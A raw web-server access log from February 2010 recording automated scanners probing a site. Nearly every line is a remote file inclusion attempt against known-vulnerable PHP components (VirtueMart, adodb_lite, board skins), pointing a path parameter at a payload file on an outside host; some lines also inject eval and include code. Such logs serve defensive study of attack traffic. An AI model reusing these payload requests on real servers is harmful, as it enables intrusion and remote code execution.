194.1.150.2 - - [06/Feb/2010:08:26:52 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:08:26:52 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:08:26:52 -0800] "GET /logs/access_091024.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:27:57 -0800] "GET /logs/access_091024.log%20%20/phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:27:57 -0800] "GET /phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:27:57 -0800] "GET /logs/phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:08:29:10 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:08:29:10 -0800] "GET /logs/access_091024.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:08:29:10 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:08:30:00 -0800] "GET /logs/access_091121.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:08:31:53 -0800] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:08:31:56 -0800] "GET /bbs///skin/uks_gallery_v3010//write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:08:31:56 -0800] "GET /logs//bbs///skin/uks_gallery_v3010//write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:08:31:56 -0800] "GET /logs/access_100116.log//bbs///skin/uks_gallery_v3010//write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:32:11 -0800] "GET /phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:32:11 -0800] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:32:11 -0800] "GET /logs/phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:08:32:16 -0800] "GET /logs/access.log//bbs///skin/uks_gallery_v3010//write.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:08:32:28 -0800] "GET /logs/access_091121.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:34:21 -0800] "GET /logs/access_091024.log/phphtml.php?htmlclass_path=http://kyky.yourfreehosting.net/files/idx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:34:21 -0800] "GET /phphtml.php?htmlclass_path=http://kyky.yourfreehosting.net/files/idx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:34:21 -0800] "GET /logs/phphtml.php?htmlclass_path=http://kyky.yourfreehosting.net/files/idx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:38:48 -0800] "GET /logs/access_091121.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:38:48 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:38:48 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:39:49 -0800] "GET /logs/access_100130.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:40:48 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:40:48 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:40:48 -0800] "GET /logs/access_091121.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:41:42 -0800] "GET /logs/access_100130.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:42:47 -0800] "GET /logs/access_100130.log/phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:43:04 -0800] "GET /logs/access_091121.log/phphtml.php?htmlclass_path=http://0d4y.t35.com/Aidians/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:18 -0800] "GET /logs/access_091121.log%20%20//cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:18 -0800] "GET /cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:18 -0800] "GET /logs/access_100116.log%20%20//cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:18 -0800] "GET /logs//cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:27 -0800] "GET /logs/access_091121.log%20%20//cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:27 -0800] "GET /logs//cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:27 -0800] "GET /logs/access_100116.log%20%20//cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [06/Feb/2010:08:43:28 -0800] "GET /cmsmadesimple//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:47:51 -0800] "GET /logs/access_091121.log//write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:47:51 -0800] "GET /write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:47:51 -0800] "GET /logs//write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:47:53 -0800] "GET /write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:47:53 -0800] "GET /logs/access_091121.log//write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:47:53 -0800] "GET /logs//write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:49:10 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://kyky.yourfreehosting.net/files/idx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:49:11 -0800] "GET /phphtml.php?htmlclass_path=http://kyky.yourfreehosting.net/files/idx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
124.217.198.155 - - [06/Feb/2010:08:49:12 -0800] "GET /logs/phphtml.php?htmlclass_path=http://kyky.yourfreehosting.net/files/idx.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:49:39 -0800] "GET /logs/scripts.log//write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.117.228.70 - - [06/Feb/2010:08:49:39 -0800] "GET /logs/scripts.log//write_update.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:08:53:33 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:08:53:33 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:08:53:34 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:08:56:35 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:08:57:34 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:01:21 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:01:21 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:01:21 -0800] "GET /logs/access.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.111.173.76 - - [06/Feb/2010:09:01:53 -0800] "GET /logs/access.log//////?mosConfig_absolute_path=http://www.lazermark.ru/magazin/administrator/components/com_virtuemart/sql/id??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
89.111.173.76 - - [06/Feb/2010:09:01:53 -0800] "GET /////?mosConfig_absolute_path=http://www.lazermark.ru/magazin/administrator/components/com_virtuemart/sql/id??????? HTTP/1.1" 200 918 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
89.111.173.76 - - [06/Feb/2010:09:01:54 -0800] "GET /logs//////?mosConfig_absolute_path=http://www.lazermark.ru/magazin/administrator/components/com_virtuemart/sql/id??????? HTTP/1.1" 200 1090 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:09:02:10 -0800] "GET /logs/access_091121.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.1.150.2 - - [06/Feb/2010:09:02:14 -0800] "GET /logs/access_091024.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:02:24 -0800] "GET /logs/access.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:02:24 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:02:25 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:09:03:28 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:09:03:28 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:09:03:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:03:54 -0800] "GET /logs/access_100130.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:03:54 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:03:54 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:04:11 -0800] "GET /logs/access_100116.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:04:11 -0800] "GET /logs/access_100130.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:04:11 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:04:11 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:05:27 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:05:27 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:05:27 -0800] "GET /logs/access.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:05:29 -0800] "GET /logs/access_100116.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.240.36.36 - - [06/Feb/2010:09:05:52 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.240.36.36 - - [06/Feb/2010:09:05:52 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.240.36.36 - - [06/Feb/2010:09:05:52 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.165.1.69 - - [06/Feb/2010:09:05:53 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.165.1.69 - - [06/Feb/2010:09:05:53 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.165.1.69 - - [06/Feb/2010:09:05:53 -0800] "GET /logs/access_100130.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [06/Feb/2010:09:06:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [06/Feb/2010:09:06:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [06/Feb/2010:09:06:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:08:15 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:08:15 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:08:15 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:08:25 -0800] "GET /logs/access_100116.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:08:49 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:08:49 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:08:49 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
